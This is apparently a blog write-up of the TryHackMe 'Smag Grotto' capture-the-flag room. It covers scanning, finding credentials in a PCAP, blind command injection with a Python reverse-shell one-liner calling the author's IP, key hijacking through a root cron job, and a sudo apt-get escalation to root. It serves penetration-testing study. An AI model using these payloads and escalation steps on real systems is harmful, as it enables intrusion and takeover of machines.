Home THM - Smag Grotto Writeup
Post
Cancel

THM - Smag Grotto Writeup

Posted Jun 18, 2023 Updated Jun 18, 2023
By Abdullah Irfan
7 min read
  • Room Name: Smag Grotto
  • Difficulty: Easy
  • Link: TryHackMe

Initial Access

  • My IP Address: 10.4.0.190
  • Machine IP Address: 10.10.58.112

The machine tagline seems like a hint: Follow the yellow brick road.

Port Scan

For my port scan, I like to run an all port scan with the verbose flag in nmap:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

┌──(kali㉿kali)-[~/Desktop/Ps]
└─$ nmap -p- -T4 -vvv 10.10.58.112     
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-18 08:04 EDT
Initiating Ping Scan at 08:04
Scanning 10.10.58.112 [2 ports]
Completed Ping Scan at 08:04, 0.48s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:04
Completed Parallel DNS resolution of 1 host. at 08:04, 6.51s elapsed
DNS resolution of 1 IPs took 6.51s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating Connect Scan at 08:04
Scanning 10.10.58.112 [65535 ports]
Discovered open port 22/tcp on 10.10.58.112
Discovered open port 80/tcp on 10.10.58.112
Increasing send delay for 10.10.58.112 from 0 to 5 due to 35 out of 87 dropped probes since last increase.
Connect Scan Timing: About 1.46% done; ETC: 08:40 (0:34:53 remaining)

The reason behind this is because sometimes a machine uses out of the norm services which the default nmap scan misses (mostly). However, since the all port scan takes a lot of time, I use the ‘-vvv’ flag so I can run a separate aggressive scan on the initially discovered ports.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

┌──(kali㉿kali)-[~/Desktop/Ps]
└─$ nmap -p 22,80 -A 10.10.58.112                                       
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-18 08:07 EDT
Nmap scan report for 10.10.58.112
Host is up (0.47s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 74e0e1b405856a15687e16daf2c76bee (RSA)
|   256 bd4362b9a1865136f8c7dff90f638fa3 (ECDSA)
|_  256 f9e7da078f10af970b3287c932d71b76 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Smag
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.05 seconds

Web Enumeration

Since I can see an HTTP server open on port 80, I immediately spin up a web browser to visit that website.

home page

This doesn’t seem helpful at all so I think of going through the following steps:

  • Viewing Source Code
  • Checking if there is a robots.txt file
  • Directory Enumeration

Viewing Source Code

Dead end :(

Robots.txt

Nope :(

Directory Enumeration

When there’s no other option left, I tend to for directory enumeration. My favorite tool is feroxbuster as it is crazy fast and does recursive scanning.

1

feroxbuster --url http://10.10.58.112 -t 20 -d 0 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

After a few seconds, feroxbuster gives me a good looking directory mail.

feroxbuster mail

Mail Directory

Upon visiting the /mail/ directory, I see a lot of juicy information.

mail directory

The first thought I have upon seeing these email addresses is that they could also be possible usernames so I keep them saved in a separate place.

PCAP files are always interesting so I download it. However, before analyzing that in Wireshark, I open up the source code (just in case).

mail source

Seeing that the PCAP file resides in a whole different subdirectory, I visit that subdirectory but it only contains this PCAP file. However, we discover another potential username commented out.

The final username wordlist I create is:

1
2
3
4

netadmin
uzi
trodd
jake

Now, onto the PCAP file.

Network Dump Analysis

The network dump only contains a single HTTP POST request and its response. However, that single POST request contains a lot of important information.

network dump

First of all, I discover a set of possible credentials for an admin panel:

1

helpdesk:cH4nG3M3_n0w

Apart from that, I notice that this dump is not for the main website but for a subdomain. So, I add the following record to the /etc/hosts file:

host file

development.smag.thm

Visiting the subdomain, I get the following directory listing:

dir listing

I visit the /login.php page and submit the form using the previously discovered credentials. To my surprise, the credentials work and I am redirected to the /admin.php page.

admin php

Exploitation

A web page that allows you to run commands? What could go wrong? I just know there is a command injection vulnerability on this page. However, entering any command doesn’t give any output. Maybe it’s blind command injection? With that mindset, I grab a python reverse shell payload from Revshells

1

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.4.0.190",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

… and spin up a netcat listener

1

nc -lvnp 9999

Injecting this payload gives us a shell!

initial shell

User Flag

As the user www-data, I am able to navigate into the user jake’s home directory. However, I’m not allowed to read the user.txt file :(

permission denied

I try a couple a privilege escalation vectors and cronjobs are a hit.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*  *    * * *   root    /bin/cat /opt/.backups/jake_id_rsa.pub.backup > /home/jake/.ssh/authorized_keys

What’s happening here is that every minute, the user root copies an authorized public key from a backup to the user jake’s ssh folder. Now, all I need to do is create an ssh public key and overwrite the backup with my own public key.

I generate a new ssh key pair using ssh-keygen

ssh keygen

After that, I copy the contents of the id_rsa.pub file created and overwrite the jake_id_rsa.pub.backup file with the copied contents.

1
2
3
4
5
6
7
8
9
10
11
12
13
14

www-data@smag:/home/jake$ cd /opt/.backups
cd /opt/.backups
www-data@smag:/opt/.backups$ ls -la
ls -la
total 12
drwxr-xr-x 2 root root 4096 Jun  4  2020 .
drwxr-xr-x 3 root root 4096 Jun  4  2020 ..
-rw-rw-rw- 1 root root  563 Jun  5  2020 jake_id_rsa.pub.backup
www-data@smag:/opt/.backups$ echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDfUYOlivnuF9s8FG7Nsl9VjNz4BUriSnMDxZyjEu9nSlTlMbu82HlSpmLBf+YdnFIvEKtrAzylrRuZ97yWNvXZfPtMHES+/18T8h7ppLfaXMrvWPqixt1JpBJGyFkTfMf7nRtm34W6L0fDqzsFjGRJv0ZNaIOFt2W2Vt19V/4fwVjZHyGi8w4/XV8aUo11KIfpwY1Xmg3+Tccg7f9UqCa8tjFMH4eAZfCBYZy5fFy3R++JUAdolmlTzUKQapKD4HyB1g31EW5vcjo1MEL286+YwrHKcgs5g13f4VQOwUz30DDlLJQQtGEwOUB+F4FEq9XKp495Tc8TUc+GaXtyez0HWv/zUrB3UBadn8+f6n8bAK2vLMq/eAXn3MWp2+5hNnKk+eoPxxdKfdXck4mfUc5piwz2dd1p3V2OVjv6VPgP/IC7WNBUagBd+SUX3NJOj0K+ESCQq0/tBq+mXZzAuB90ZpZ2rgNhsGET2A3gWh6M61hmPVGecMGH0of/pLZBbXM= jake@smag.thm' > jake_id_rsa.pub.backup
<GH0of/pLZBbXM= jake@smag.thm' > jake_id_rsa.pub.backup                      
www-data@smag:/opt/.backups$ cat jake_id_rsa.pub.backup
cat jake_id_rsa.pub.backup
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDfUYOlivnuF9s8FG7Nsl9VjNz4BUriSnMDxZyjEu9nSlTlMbu82HlSpmLBf+YdnFIvEKtrAzylrRuZ97yWNvXZfPtMHES+/18T8h7ppLfaXMrvWPqixt1JpBJGyFkTfMf7nRtm34W6L0fDqzsFjGRJv0ZNaIOFt2W2Vt19V/4fwVjZHyGi8w4/XV8aUo11KIfpwY1Xmg3+Tccg7f9UqCa8tjFMH4eAZfCBYZy5fFy3R++JUAdolmlTzUKQapKD4HyB1g31EW5vcjo1MEL286+YwrHKcgs5g13f4VQOwUz30DDlLJQQtGEwOUB+F4FEq9XKp495Tc8TUc+GaXtyez0HWv/zUrB3UBadn8+f6n8bAK2vLMq/eAXn3MWp2+5hNnKk+eoPxxdKfdXck4mfUc5piwz2dd1p3V2OVjv6VPgP/IC7WNBUagBd+SUX3NJOj0K+ESCQq0/tBq+mXZzAuB90ZpZ2rgNhsGET2A3gWh6M61hmPVGecMGH0of/pLZBbXM= jake@smag.thm
www-data@smag:/opt/.backups$

Now, I can finally log in as the user jake using ssh:

1

ssh jake@10.10.58.112 -i id_rsa

And viola! I get the user flag!

user flag

Root Flag

For horizontal privilege escalation, the first vector I tend to go about is looking for files I can run as a superuser using the command sudo -l. In this case, the user jake is able to run /usr/bin/apt-get is a super user without a password.

1
2
3
4
5
6

jake@smag:~$ sudo -l
Matching Defaults entries for jake on smag:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jake may run the following commands on smag:
    (ALL : ALL) NOPASSWD: /usr/bin/apt-get

After finding this information, I go to GTFOBins to check if the apt-get binary is a Get-the-f–k-out binary. Luckily, it is!

GTFOBins gives me a working payload to get a privileged shell as the root user.

1

sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh

Now, all I need to do is cat out the contents of the /root/root.txt file and this box is pwned!

root flag

Writeups, TryHackMe
ctf tryhackme pentesting cyber security penetration testing
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents